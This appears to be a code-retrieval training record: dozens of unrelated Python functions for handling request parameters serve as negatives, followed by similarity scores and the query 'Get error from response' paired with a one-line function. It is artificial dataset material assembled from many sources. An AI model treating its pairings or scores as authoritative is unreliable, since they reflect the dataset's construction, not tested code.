request_parms[it]\n return res", "def request_params( self ) -> dict:\n return BaseNetsuiteEtl.BASE_URI_PARAM.copy()", "def _set_parameters(self, *path_params, **query_params):\n\n # take timeout\n try:\n self._timeout = int(query_params.get(\n constants.RequestConst.TIMEOUT, self._timeout\n ))\n except ValueError:\n pass\n try:\n del query_params[constants.RequestConst.TIMEOUT]\n except KeyError:\n pass\n\n # set default API call params\n for key, value in self.default_parameters.items():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n _query_params = self.query_parameters.get_params()\n\n # set API call params defined during the \"call\" invocation\n for key, value in query_params.items():\n if value is None:\n continue\n\n if key in _query_params.values():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n elif key in _query_params.keys():\n self.parameters[\n constants.RequestConst.QUERY\n ][_query_params[key]] = value\n\n if self.method == constants.RequestConst.GET:\n # transform all True and False param to 1 and 0\n for key, value in self.parameters[\n constants.RequestConst.QUERY\n ].items():\n if value is True:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.TRUE\n if value is False:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.FALSE\n\n # set optional url path params\n for value in path_params:\n self.parameters[constants.RequestConst.PATH].append(value)", "def inject_get_param(request, injectionstring):\r\n requests = []\r\n return requests", "def add_parameters(self, path, method, params: set):\n if path not in self.param_infos:\n self.param_infos[path] = {}\n\n method = method.upper()\n if method not in self.param_infos[path]:\n self.param_infos[path][method] = set()\n\n self.param_infos[path][method] |= params", "def _generate_params(self):\n return {\n 'lis_outcome_service_url': self.lis_outcome_service_url,\n 'lis_result_sourcedid': self.lis_result_sourcedid,\n 'oauth_consumer_key': self.key\n }", "def request(self, params=None):\n\t\trequest = APIRequest(self.api)\n\t\tfor attr in APIRequest.attrs:\n\t\t\tval = getattr(self, attr)\n\t\t\t# Copy Mappings (e.g. headers)\n\t\t\tval = dict(val) if isinstance(val, collections.abc.Mapping) else val\n\t\t\tsetattr(request, attr, val)\n\t\t# Update GET parameters\n\t\tif params:\n\t\t\trequest.params.update(params)\n\t\treturn request", "def updateParameters(self,*args,**kwargs):\n for key in kwargs.keys():\n self._params[key] = kwargs[key]", "def add_query_param(request, key, val):\n iri = request.get_full_path()\n uri = iri_to_uri(iri)\n return escape(replace_query_param(uri, key, val))", "def set_params(self, params):", "def update_params(self, extra_params):\n self._params.update(extra_params)\n return self", "def update_params(self):\n pass", "def add_parameter():\n argget = utils.create_common_parameter_list()\n add_helpmessage(argget)\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n parameter_info['encryption'] = args.encryption\n return parameter_info", "def InvocationAddRequest(builder, request):\n return AddRequest(builder, request)", "def __call__(self, request):\n if self.where == \"qs\":\n parts = urlparse(request.url)\n qs = parse_qs(parts.query)\n qs[self.qs_key] = self.token\n request.url = urlunparse(\n (\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n urlencode(qs),\n parts.fragment,\n )\n )\n elif self.where == \"header\":\n request.headers[\"Authorization\"] = \"Bearer {}\".format(self.token)\n return request", "def __init__(self, request):\n self.arguments = {}\n for k, v in request.GET.items():\n self.arguments.setdefault(k, []).append(v)\n\n self.full_url = lambda: request.url\n self.host = request.host\n self.path = request.path", "def add_param(element):\n nonlocal params\n name = element.attrib.get(\"name\", None)\n value = element.attrib.get(\"value\", \"\")\n if name:\n params[name] = value", "def request(query):", "def modify_query_params(context, **kwargs):\n request = context['request']\n params = request.GET.copy()\n for key, value in kwargs.items():\n if value == '':\n if key in params:\n del params[key]\n else:\n params[key] = value\n return ('?' + params.urlencode()) if params else ''", "def _extend_url(self, url, params):\n # filter out None parameters\n params = {k:v for k,v in params.items() if v is not None}\n for key in params:\n url = url + \"&{}={}\".format(key, params[key])\n return url", "def params(self, **kwargs):\n return kwargs", "def _add_param(self, name):\n param = ParameterInfo()\n param._name = name\n self._parameters.append(param)\n return param", "def _get_query_params(self, req):\n params = {\n 'filters': self._get_filters(req),\n 'limit': self._get_limit(req),\n 'sort_key': [self._get_sort_key(req)],\n 'sort_dir': [self._get_sort_dir(req)],\n 'marker': self._get_marker(req),\n }\n\n for key, value in params.items():\n if value is None:\n del params[key]\n\n return params", "def meta_params(request):\n return request.param", "def build_request_params(title, year, month, day, hour, minute):\n second = 00 # we always use 0 seconds\n headers = {\n 'content-type': 'application/json+protobuf',\n }\n\n id = time.time() # the reminder id is the unix time at which it was created\n reminder_id = 'cli-reminder-' + str(id)\n\n # The structure of the dictionary was extracted from a browser request to\n # create a new reminder. I didn't find any official documentation\n # for the request parameters.\n data = {\n \"2\": {\n \"1\": 7\n },\n \"3\": {\n \"2\": reminder_id\n },\n \"4\": {\n \"1\": {\n \"2\": reminder_id\n },\n \"3\": title,\n \"5\": {\n \"1\": year,\n \"2\": month,\n \"3\": day,\n \"4\": {\n \"1\": hour,\n \"2\": minute,\n \"3\": second,\n }\n },\n \"8\": 0\n }\n }\n return headers, data", "def get_params(self, params, name_request):\n self.write('')\n for elem in params:\n request_type = elem['type'] if elem.get('type', None) else 'schema'\n name = elem['name']\n if elem.get('required', None):\n name += '(required)'\n schema = elem.get('schema', None)\n name = f':{name_request} {request_type} {name}:'\n if schema:\n definition = schema['$ref'].split('/')[-1]\n self.write(name + f' :ref:`{definition}`', 1)\n self.write('')\n else:\n desc = elem.get('description', '')\n self.write(name)\n self.write(f'{desc}', self.indent_depth + 1)\n self.write('')", "def updateParameters(self, parameters):", "def set_params(self):\r\n pass", "def request_params(\n self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None\n ) -> MutableMapping[str, Any]:\n return {\"ext_id\": self.ext_id, \"cid\": self.cid}", "def inject(self, request: BaseRequest, args_view: list, kwargs_view: dict):", "def get_query_parameters(self):\n parameters = super().get_query_parameters()\n\n if self.method in ['GET', 'DELETE']:\n self.add_parameters(parameters, [\n self.get_company_id_parameter(),\n self.get_lookup_parameter(),\n ])\n\n return parameters", "def define_parameters(self):", "def params(self):\n if isinstance(self.request, list):\n return unmunchify(self.request)\n (params, _) = xmlrpc.loads(self.request)\n return params", "def set_params(self, **kwargs) -> NoReturn:\n pass", "def construct_params(self):\n\n return {\"expand\": self.get_expand()}", "def add_parameter():\n parameter_info = {}\n argget = utils.create_common_parameter_list(example_string='''\nExample:\n \"python add_event_subscriptions.py -i 10.10.10.10 -u USERID -p PASSW0RD --destination https://10.10.10.11 --eventtypes Alert --context test\"\n''')\n add_helpmessage(argget)\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n parameter_info[\"destination\"] = args.destination\n parameter_info[\"eventtypes\"] = args.eventtypes\n parameter_info[\"context\"] = args.context\n return parameter_info", "def addParameters(self):\n\n self.pRefArray = self.addParam(\"ikrefarray\", \"string\", \"\")\n self.pUseIndex = self.addParam(\"useIndex\", \"bool\", False)\n\n self.pParentJointIndex = self.addParam(\n \"parentJointIndex\", \"long\", -1, None, None)\n\n self.pJoint = self.addParam(\"joint\", \"bool\", True)", "def _build_request(self, endpoint='', **parameters):\n\n request = {\n 'method': parameters.pop('method', 'GET'),\n 'data': parameters.pop('data', None),\n 'json': parameters.pop('json', None)\n }\n\n # url = {base_url}[/{endpoint}]\n url = '/'.join(filter(None, (self.__class__.base_url, endpoint)))\n\n for index, (key, value) in enumerate(parameters.items()):\n url += '{symbol}{key}={value}'.format(\n symbol='&' if index else '?', key=key, value=value\n )\n\n request['url'] = url\n\n return request", "def get_complete_parameters(self, auth_request_params):\n params = super().get_complete_parameters(auth_request_params)\n params.update(\n {\n \"id_token\": sign_id_token(self.get_apple_id_token_payload()),\n \"user\": json.dumps(\n {\n \"email\": \"[email protected]\",\n \"name\": {\n \"firstName\": \"A\",\n \"lastName\": \"B\",\n },\n }\n ),\n }\n )\n return params", "def updated_querystring(request, params):\n original_params = request.GET.copy()\n for key in params:\n if key in original_params:\n original_params.pop(key)\n original_params.update(params)\n return original_params.urlencode()", "def updated_querystring(request, params):\n original_params = request.GET.copy()\n for key in params:\n if key in original_params:\n original_params.pop(key)\n original_params.update(params)\n return original_params.urlencode()", "def _get_query_params(self, req):\n params = {}\n for PARAM in SUPPORTED_PARAMS:\n if req and PARAM in req:\n params[PARAM] = req.get(PARAM)\n\n return params", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ModifyParametersResponse, self).__init__(*args, **kwds)", "def _inject_params(self, params):\n\n params.extend([LocaleParam(), CompileDomainsParam(),\n UseFuzzyParam(), StatisticsParam(),\n DirectoryParam(), OutputFileParam()])\n\n return super()._inject_params(params)", "def _update_params(self):\n pass", "def _parse_in_request(self, request):\n error = None\n self.logger.debug(\"Http method: %s\" % request.method)\n if request.method == 'GET':\n self._params = request.args.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)\n \n elif request.method == 'POST':\n self._params = request.form.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)", "def Params(req, cmd=None):\n\tif req == 'POST':\n\t\treturn putFunc(\"Params\", cmd)\n\tif req == 'GET':\n\t\treturn getFunc(req, \"Params\")", "def __update_request(self, request_dict, namespace, apikey):\n request_dict['namespace'] = namespace if namespace else self.namespace\n request_dict['apikey'] = apikey if apikey else self.apikey", "def addParam(self, var: IRVariable):\n self.params[var.name] = var", "def set_params(self):\n raise NotImplementedError", "def add_param(self, param):\n self.params.append(param)\n return self", "def _build_update_params(self, params):", "def addParams(self, params, container = None):\n\n\t\tfor param, value in params.iteritems():\n\t\t\tself.addParam([param, value], container)\n\n\t\treturn self", "def set_params(self, *arg):\n pass", "def add_parameters(self, parameters):\n for param in parameters:\n self._queue.put(param)", "def add_http_var(parameter_name, required=True):\n def wrap(func):\n def decorator(request, *args, **kwargs):\n if parameter_name in request.POST:\n kwargs[parameter_name] = request.POST[parameter_name]\n elif parameter_name in request.GET:\n kwargs[parameter_name] = request.GET[parameter_name]\n elif required:\n return HttpResponseBadRequest('Please define GET or POST parameter '+parameter_name)\n else:\n pass\n return func(request, *args, **kwargs)\n return decorator\n return wrap", "def params():\n raise NotImplementedError", "def add_parameters(self, parameters, new_parameters):\n for new in new_parameters:\n if new:\n for parameter in parameters:\n if parameter.name == new.name:\n break\n else:\n parameters.append(new)", "def _set_query_params(query, key, value):\n query.update({str(key): str(value)})", "def gather_params(self):\n for layer in self.layers:\n for name, value in layer.params.iteritems():\n self.params[name] = value", "def prepare_request_params(\n params: {},\n logger,\n url_obj: URL,\n input_fields: list,\n query_params: dict = None,\n):\n if not query_params:\n query_params = {}\n\n headers = get_default_header()\n basic_url = url_obj.get_basic_url()\n\n for field in input_fields:\n query_value = params.get(field, \"\")\n\n if field == \"range\" and query_value != \"\":\n check, query_range = validate_query_range(query_value)\n if not check:\n logger.error(query_range)\n logger.info(\"Terminating: Query Range provided is invalid\")\n raise PluginException(cause=INVALID_RANGE_FOUND)\n headers[\"Range\"] = f\"items={query_range}\"\n else:\n if query_value != \"\":\n query_params[field] = query_value\n\n final_queries = []\n for key in query_params:\n final_queries.append(f\"{key}={query_params[key]}\")\n\n if len(final_queries) > 0:\n basic_url = f\"{basic_url}?{'&'.join(final_queries)}\"\n\n return basic_url, headers", "def get_params(self):\n return {\"d\": \"155\"}", "def get_params(self):", "def addParameter(self, name, value):\r\n if not name:\r\n raise InvalidRequest('Parameter name is not a valid.')\r\n\r\n if name in self._parameters:\r\n raise InvalidRequest(\"Can not use the same parameter name '{0}' \"\r\n 'in the same container twice.'.format(name))\r\n\r\n parameter = self._obj.createParameter(name, value)\r\n self._parameters[name] = parameter\r\n parameter.notifyOnDeath(self._parameterDied)", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def set_params(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.params.keys():\n self.params[key] = value\n else:\n raise KeyError", "def add_parameter():\n parameter_info = {}\n argget = utils.create_common_parameter_list()\n help_str = \"The Contact person allows you to specify the name and phone number of the person who should be contacted if there is a problem with this system. \"\n argget.add_argument('--contact', type=str,\n help= help_str)\n help_str = \"The Rack Name can be used to help locate the server to a particular rack. \"\n help_str += \"The value is optional and is not configurable in a Flex node. \"\n argget.add_argument('--rack_name', type=str,\n help= help_str)\n help_str = \"The Room No can be used to help locate the server to a room within a data center,\"\n help_str += \"or for multiple data centers at a site. This could also be used to specify the floor or any other large container of racks.\"\n help_str += \" The value is optional and is not configurable in a Flex node.\"\n argget.add_argument('--room_no', type=str,\n help= help_str)\n\n help_str = \"The Building identifies where this system has been installed. \"\n help_str +=\"The information in this parameter, along with Room No, Rack Name and lowest_u position (if provided) allow someone to quickly find the server when necessary for maintenance or other purposes. \"\n help_str +=\"The value is required by SNMPv3 agent service. \"\n argget.add_argument('--building', type=str,\n help= help_str)\n help_str = \"The lowest_u can be used to help locate the server to a position within the rack. This value is not configurable in a Flex node.\"\n argget.add_argument('--lowest_u', type=int,\n help= help_str)\n help_str = \"The Address is optional for full postal address.\"\n argget.add_argument('--address', type=str,\n help= help_str)\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n parameter_info[\"contact\"] = args.contact\n parameter_info[\"rack_name\"] = args.rack_name\n parameter_info[\"room_no\"] = args.room_no\n parameter_info[\"building\"] = args.building\n parameter_info[\"lowest_u\"] = args.lowest_u\n parameter_info[\"address\"] = args.address\n return parameter_info", "def append_event_to_params_dict(self, new_name_and_parameters):\n\n params_dict.update(new_name_and_parameters)", "def setup(self, request_params):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def add_or_replace_parameters(url, new_parameters):\n return _add_or_replace_parameters(url, new_parameters)", "def encode_params(self, base_url, method, params):\n raise NotImplementedError()", "def test_request_parameters(self):\n httpretty.register_uri(httpretty.POST, 'http://somewhere.com/test')\n r = CkanResource('http://somewhere.com/test', None, {'offset': None, 'limit': None, 'carrot': 'cake'})\n s = r._get_response(10, 200)\n self._assert_params_equals(httpretty.last_request().path, {'offset': 2000, 'limit': 200, 'carrot': 'cake'})", "def test_request_params():\n ctxt = SqContextMock('key', 'http', 'rest-ip', 80)\n sqobj = SqObjMock(ctxt, 'default', 'default', 'default',\n 'default', 'default', 'default', 'default')\n engine = SqRestEngine(sqobj)\n # paramters which will override engine internal paramters\n sqobj_override_params = ['hostname', 'namespace', 'view']\n # other parameters\n other_params = ['other_param_0', 'other_param_1']\n\n testing_params = sqobj_override_params + other_params\n # try all combinations of params\n for n_sq_params in range(1, len(testing_params)+1):\n for sq_params in combinations(testing_params, n_sq_params):\n req_params = {p: 'override' for p in sq_params}\n validate_args(engine, req_params)", "def get_params(self):\n pass", "def _build_request_url(self, params, kwargs, post=False):\n if post:\n return '%s?method=%s&type=%s' % (self.endpoint, self.methodname, params.get('type', 'json'))\n else:\n return '%s?%s' % (self.endpoint, kwargs)", "def query_params(self):\n return self.request._request.GET", "def _update_request_uri_query(self, request):\n if \"?\" in request.path:\n request.path, _, query_string = request.path.partition(\"?\")\n if query_string:\n query_params = query_string.split(\"&\")\n for query in query_params:\n if \"=\" in query:\n name, _, value = query.partition(\"=\")\n request.query.append((name, value))\n\n request.path = url_quote(request.path, \"/()$=',\")\n\n # add encoded queries to request.path.\n if request.query:\n request.path += \"?\"\n for name, value in request.query:\n if value is not None:\n request.path += \"{}={}{}\".format(name, url_quote(value, \"/()$=',\"), \"&\")\n request.path = request.path[:-1]\n\n return request.path, request.query", "def add_parameter():\n argget = utils.create_common_parameter_list()\n argget.add_argument('--interfaceid', type=str, default='1', help='Serial interface instance id. (default instance id is 1)')\n argget.add_argument('--bitrate', type=str, default='', help='This property indicates the transmit and receive speed of the serial connection. Support: [9600, 19200, 38400, 57600, 115200]')\n argget.add_argument('--stopbits', type=str, default='', help='This property indicates the stop bits for the serial connection. Support:[\"1\",\"2\"].')\n argget.add_argument('--parity', type=str, default='', help='This property indicates parity information for a serial connection. Support: [\"None\", \"Even\", \"Odd\"]')\n argget.add_argument('--enabled', type=str, default='', help='This property indicates if this interface is enabled. Support:(0:false,1:true)')\n args = argget.parse_args()\n parameter_info = utils.parse_parameter(args)\n # Parse the added parameters\n try:\n parameter_info['bitrate'] = args.bitrate\n parameter_info['stopbits'] = args.stopbits\n parameter_info['parity'] = args.parity\n parameter_info['interfaceid'] = args.interfaceid\n parameter_info['enabled'] = args.enabled\n except:\n pass\n return parameter_info" ]
[ "0.74066496", "0.72835517", "0.6995281", "0.6825499", "0.68013364", "0.65432173", "0.6506432", "0.64661425", "0.6460794", "0.63875496", "0.6370902", "0.6263036", "0.62520313", "0.6237418", "0.6223249", "0.61894953", "0.6144124", "0.61332905", "0.6104013", "0.60877264", "0.6074792", "0.6047774", "0.6038013", "0.60356283", "0.6028165", "0.60262614", "0.602559", "0.6015095", "0.5997157", "0.59850043", "0.59678936", "0.59619796", "0.59549206", "0.59529907", "0.59519684", "0.59435844", "0.5925098", "0.59209853", "0.5913908", "0.59111625", "0.5910651", "0.58995014", "0.5897894", "0.5884152", "0.5881049", "0.5870754", "0.5861405", "0.58538646", "0.58519834", "0.583949", "0.58371174", "0.5831244", "0.58280295", "0.58177197", "0.5810609", "0.5808321", "0.57954097", "0.5777409", "0.57752174", "0.57508427", "0.57486343", "0.57425153", "0.57425153", "0.57401544", "0.5739919", "0.5738579", "0.5737497", "0.5732828", "0.57275814", "0.5725329", "0.5713986", "0.5706484", "0.57020414", "0.56952983", "0.5691175", "0.5683238", "0.5681417", "0.56786823", "0.5672793", "0.56696236", "0.56521904", "0.5649366", "0.5645603", "0.5643294", "0.56430775", "0.56320876", "0.56290996", "0.5627637", "0.56269956", "0.5626665", "0.5623292", "0.5620522", "0.56189007", "0.5609653", "0.5608689", "0.5606877", "0.5596294", "0.5584737", "0.5582699", "0.5575852" ]
0.58247703
53
Get error from response.
def get_error_message(self, data, response=None): return str(data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getError(self):\n \n return self.resp[\"error\"]", "def _get_error_message(response):\n try:\n return response.json()[\"detail\"]\n except (KeyError, _JSONDecodeError):\n return response.text", "def error(self):\n error = self._wrapped.error\n if error:\n return error\n\n return self.json['response'].get('error')", "def _extract_error(self, response):\r\n try:\r\n et = ElementTree.parse(response)\r\n error = et.findtext('body/pre')\r\n return error\r\n except ExpatError,e:\r\n return \"%s: %s (%d/%s)\" % (e,response.read(),response.status,response.reason)", "def errorResponse(self):\n return self._errorResponse", "def error(self) -> 'outputs.StatusResponse':\n return pulumi.get(self, \"error\")", "def error_code(self):\n return self.json['response'].get('error_code')", "def error(self):\n return self.get('error')", "def _extract_error(self, resp):\n reason = resp.headers.get(\"reason\", None)\n full_response = None\n\n if reason is None:\n try:\n # if response is in json format\n reason = resp.json()[\"error\"][\"msg\"]\n except KeyError:\n # if json response has unexpected structure\n full_response = resp.content\n except ValueError:\n # otherwise we assume it's html\n reason, full_html = self._scrape_response(resp.headers, resp.content)\n full_response = unescape_html(full_html)\n\n msg = \"[Reason: %s]\" % reason\n\n if reason is None:\n msg += \"\\n%s\" % full_response\n\n return msg", "def parse_response(self, response, **kw):\n data = super().parse_response(response, **kw)\n error = data.get('error')\n if error is None:\n return data['result']\n else:\n # assume error object follows json-rpc 2.0 spec formatting\n self.handle_error(code=error['code'], msg=error['message'])", "def _get_error_message_from_httperror(err):\n json_error = json.loads(str(err.content.decode()))\n return json_error.get('error', {}).get('message', '')", "def __get_response_error(message, response):\n\n rjson = response.json()\n error_description = \"Code %s - %s\" %(str(response.status_code), rjson.get('message'))\n\n return {\n 'app_message': \"%s\" % (message),\n 'error_description': \"[%s] - %s\" % (message, error_description),\n 'code': response.status_code\n }", "def error(self):\n return self['error']", "def get_errors(response):\n errors = response.get(\"error\")\n if errors:\n return [e.get(\"message\") for e in errors]\n return None", "def error(self, http_error):\n return HTTPResponse(str(http_error), status=http_error.status)", "def handle_error_response(resp):\n error_message = ''\n error_message_with_reason = ''\n try:\n error_message = (\n resp.json()\n .get('fireeyeapis', {})\n .get('description', '')\n .strip()\n )\n error_message = error_message.replace('\\n', '')\n if error_message:\n error_message_with_reason = f'Reason: {error_message}'\n except ValueError: # ignoring json parsing errors\n pass\n if resp.headers.get('Content-Type', '') == CONTENT_TYPE_ZIP:\n error_message = error_message_with_reason = resp.text\n\n status_code_messages = {\n 400: f\"{MESSAGES['BAD_REQUEST_ERROR']} {error_message_with_reason}\",\n 401: MESSAGES['AUTHENTICATION_ERROR'],\n 403: error_message,\n 404: error_message,\n 406: error_message,\n 407: MESSAGES['PROXY_ERROR'],\n 500: MESSAGES['INTERNAL_SERVER_ERROR'],\n 503: MESSAGES['INTERNAL_SERVER_ERROR'],\n }\n\n if resp.status_code in status_code_messages:\n demisto.debug(\n f'Response Code: {resp.status_code}, Reason: {status_code_messages[resp.status_code]}'\n )\n raise DemistoException(status_code_messages[resp.status_code])\n else:\n raise DemistoException(resp.raise_for_status())", "def validate_response(response):\n\n r = response\n try:\n r.raise_for_status()\n except HTTPError as e:\n message = dict(status_code=r.status_code, exception=e)\n\n try:\n response = r.json()\n message['response'] = response\n except JSONDecodeError as e:\n message['response'] = r.content\n\n raise HTTPError(message)", "def handle_error_response(response_body):\n try:\n error_components = []\n error_data = json.loads(response_body)\n\n error_components.append(\"Error code {}\".format(error_data[\"error\"]))\n if \"error_description\" in error_data:\n error_components.append(\": {}\".format(error_data[\"error_description\"]))\n if \"error_uri\" in error_data:\n error_components.append(\" - {}\".format(error_data[\"error_uri\"]))\n error_details = \"\".join(error_components)\n # If no details could be extracted, use the response data.\n except (KeyError, ValueError):\n error_details = response_body\n\n raise exceptions.OAuthError(error_details, response_body)", "def get_error(self):\n return self.e", "def handle_errors(resp: requests.Response):\n error_text = resp.text\n if isinstance(resp.text, bytes):\n try:\n error_text = error_text.decode(UTF_ENCODING)\n except UnicodeDecodeError:\n error_text = error_text.decode(\"iso-8859-1\")\n if error_text != \"\":\n _raise_error(error_text)\n resp.raise_for_status()", "def _err_response(self, msg):\r\n return {'success': False, 'error': msg}", "def _parse_store_error(self, response):\n default_msg = \"Failure working with the Store: [{}] {!r}\".format(\n response.status_code, response.content\n )\n try:\n error_data = response.json()\n except ValueError:\n return default_msg\n\n try:\n error_info = [(error[\"message\"], error[\"code\"]) for error in error_data[\"error-list\"]]\n except (KeyError, TypeError):\n return default_msg\n\n if not error_info:\n return default_msg\n\n messages = []\n for msg, code in error_info:\n if code:\n msg += \" [code: {}]\".format(code)\n messages.append(msg)\n return \"Store failure! \" + \"; \".join(messages)", "def callback(response):\n error_msg = None\n if response.status_code >= 300 and response.status_code < 500:\n resp = response.json()\n if response.status_code == 401 and resp.get(\"message\") == \"Authentication Error\":\n raise AuthenticationError()\n\n msg = resp.get('messages') or resp.get('message')\n details = resp.get('details')\n error_msg = u\"ReaQta Error: \\n status code: {0}\\n message: {1}\\n details: {2}\".format(\n response.status_code,\n msg,\n details)\n\n return response, error_msg", "def get_error(self):\n return self.exc_info", "def error(self):\n retval = self.resource.error()\n if not retval and self._exception:\n retval = _Error(\n self._exception.code,\n str(self._exception),\n None)\n return retval", "def response_error(error, status=400):\n\n response = {\n 'status': 'failed',\n 'error': error\n }\n\n return response_json(response, status=400)", "def return_request_error(error_message: str, http_status_code: int, response: Response):\n response.status_code = http_status_code\n return {\n 'error': error_message\n }", "def response_error(response):\n if response.headers.get('X-RateLimit-Remaining') is not None:\n if int(response.headers['X-RateLimit-Remaining']) == 0:\n sys.stderr.write('Error: Rate Limit Reached, will reset in ' + response.headers.get(\n 'X-RateLimit-Reset') + ' seconds \\n')\n return True\n try:\n response.raise_for_status()\n except requests.exceptions.HTTPError as error:\n sys.stderr.write(\"\\nRequest Error:\\t %s\" % error.message)\n try:\n sys.stderr.write(\"\\nError code:\\t %s\" % response.json()['errorCode'])\n sys.stderr.write(\"\\nError message:\\t %s \" % response.json()['message'])\n except (ValueError, KeyError):\n pass\n\n if response.status_code == 500:\n sys.stderr.write('Your account may have no owner assigned. '\n 'Please visit www.logentries.com for information on '\n 'assigning an account owner. \\n')\n return True\n\n if response.status_code == 200:\n if response.headers['Content-Type'] != 'application/json':\n sys.stderr.write('Unexpected Content Type Received in Response: ' + response.headers[\n 'Content-Type'])\n return True\n else:\n return False\n return False", "def error(self):\n return self._error", "def error(self):\n return self._error", "def error(self):\n return self._error", "def read_tapis_http_error(http_error_object):\n h = http_error_object\n # extract HTTP response code\n code = -1\n try:\n code = h.response.status_code\n assert isinstance(code, int)\n except Exception:\n # we have no idea what happened\n code = 418\n\n # extract HTTP reason\n reason = 'UNKNOWN ERROR'\n try:\n reason = h.response.reason\n except Exception:\n pass\n\n # Tapis APIs will give JSON responses if the target web service is at all\n # capable of fulfilling the request. Therefore, try first to extract fields\n # from the JSON response, then fall back to returning the plain text from\n # the response.\n err_msg = 'Unexpected encountered by the web service'\n status_msg = 'error'\n version_msg = 'unknown'\n try:\n j = h.response.json()\n if 'message' in j:\n err_msg = j['message']\n if 'status' in j:\n status_msg = j['status']\n if 'version' in j:\n version_msg = j['version']\n except Exception:\n err_msg = h.response.text\n\n httperror = '[{}] {}; message: {}; status: {}; version: {}; response.content: {}'\n return httperror.format(code, reason, err_msg, status_msg, version_msg,\n h.response.content)", "def validate_response(response: json):\n if \"error\" in response:\n print(\"ERROR: Request returned error\")\n print_request_response(response)\n exit(1)", "def get_alexa_error(data: dict) -> Union[str, None]:\n if \"request\" in data and \"err\" in data[\"request\"] and \"message\" in data[\"request\"][\"err\"]:\n return data[\"request\"][\"err\"][\"message\"]\n else:\n return None", "def error(self):\n errors = self._info.get('error', {}).get('errors')\n if not errors:\n return None\n return ' '.join(err.get('message', 'unknown') for err in errors)", "def error_response(error_text):\n return Response(json.dumps({'error' : error_text}), status=404, mimetype='application/json')", "def auth_error(error):\n return jsonify(error.error), error.status_code", "def _create_error_response(self, error):\n status = error.status\n try:\n body = json.loads(error.body)\n except Exception:\n body = {}\n if status in [403, 429]:\n # Parse differently if the error message came from kong\n errors = [ApiError(None, body.get(Responses.message, None))]\n else:\n errors = [ApiError(err.get(Responses.context, None),\n err.get(Responses.message, None))\n for err in body.get(Responses.errors, {})]\n return ErrorResponse(status, errors, headers=error.headers)", "def evaluate_response(response):\n if isinstance(response, Exception):\n raise type(response)(response)\n else:\n if response.status_code == 401:\n raise MyExceptions.WrongCredentials(\n 'The RPC credentials in the ' +\n 'settings.py file are incorrect\\n' +\n 'Fix it and try again'\n )\n try:\n error = response.json()['error']\n except (ValueError, KeyError):\n try:\n return response.json()['result']\n except (ValueError, KeyError):\n return\n else:\n raise MyExceptions.RpcError(error['message'])", "def parsed_error_msg(self):\r\n return self.error_msg", "def get_error_response():\n response = HTTPResponse.HTTPResponse(version=1.0, status_code=500,\n phrase=\"Internal Error\")\n headers = HTTPHeaders.HTTPHeaders()\n add_default_headers(headers)\n headers[\"Content-Length\"] = str(0)\n headers[\"Connection\"] = \"close\"\n response.set_headers(headers)\n\n return response.build_response()", "def parse_response(self, response):\n data = json_decode(response)\n\n if data['stat'] == 'error':\n self.logger.debug(\"Response:\\n\" + json_encode(data, indent=4))\n try:\n message = data['error_description']\n except KeyError:\n message = data['message']\n raise ApiResponseError(data['code'], data['error'], message, data)\n return data", "def parse_response(self, response):\n try:\n response = json.loads(response)\n if 'error' in response:\n if 'message' in response['error']:\n raise self.CMoreError(response['error']['message'])\n elif 'description' in response['error']:\n raise self.CMoreError(response['error']['description'])\n elif 'code' in response['error']:\n raise self.CMoreError(response['error']['error'])\n\n except ValueError: # when response is not in json\n pass\n\n return response", "def query_error(self):\n return self.details[KEY_QUERY_ERROR]", "def raise_on_error(request: requests.Response) -> None:\n if request.status_code >= 400:\n json_res = request.json()\n raise requests.HTTPError(json_res)\n\n return None", "def handle_error(e, error_response_str):\n error_output = e.decode(encoding='UTF-8')\n print_error(error_response_str)\n print_error(error_output)", "def get_errors(self, response: response_domain_model.Response, question_code: str) -> Sequence['ValidationError']:\n ...", "def raise_error(self, err_code, response):\n clsname = str(self.__class__).split('.')[-1].split(\"'\")[0]\n raise ERROR_CODES[err_code](\n 'Response Type: \"%s\"\\tResponse: %s' % (\n clsname, response))", "def odata_error(self, request, environ, start_response, sub_code,\n message='', code=400):\n response_headers = []\n e = core.Error(None)\n e.add_child(core.Code).set_value(sub_code)\n e.add_child(core.Message).set_value(message)\n response_type = self.content_negotiation(\n request, environ, self.ErrorTypes)\n if response_type is None:\n # this is an error response, default to text/plain anyway\n response_type = params.MediaType.from_str(\n 'text/plain; charset=utf-8')\n elif response_type == \"application/atom+xml\":\n # even if you didn't ask for it, you get application/xml in this\n # case\n response_type = \"application/xml\"\n if response_type == \"application/json\":\n data = str(''.join(e.generate_std_error_json()))\n else:\n data = str(e)\n data = data.encode('utf-8')\n response_headers.append((\"Content-Type\", str(response_type)))\n response_headers.append((\"Content-Length\", str(len(data))))\n start_response(\"%i %s\" % (code, sub_code), response_headers)\n return [data]", "def test_response_error(err_msg):\n from server import response_error\n error_text = b'HTTP/1.1 %s' % err_msg\n assert response_error(err_msg).split(b'\\r\\n')[0] == error_text", "def error_file(self) -> 'outputs.FileMetadataResponse':\n return pulumi.get(self, \"error_file\")", "def get_http_error(status_code: int) -> Optional[Type[HTTPError]]:\n return _STATUS_CODE_TO_HTTP_ERRORS.get(status_code)", "def handle_api_error(self, response):\n code = response.status_code\n self.__log(f'Handling API error with status code {code}.', 'error')\n if code == 401:\n self.__log(f'Invalid credentials. Please make sure your token is correct.', 'error')\n raise InvalidCredentialsError\n if code == 404:\n self.__log(f'File not found on query. Make sure query URL is correct and retry.', 'error')\n raise FileNotFoundError\n if code == 422:\n content = json.loads(response.content)\n for error in content['errors']:\n self.__log(f'API could not process the request. Message: {error[\"message\"]}.', 'error')\n raise UnprocessableRequestError(f'Issue with field {error[\"field\"]}: 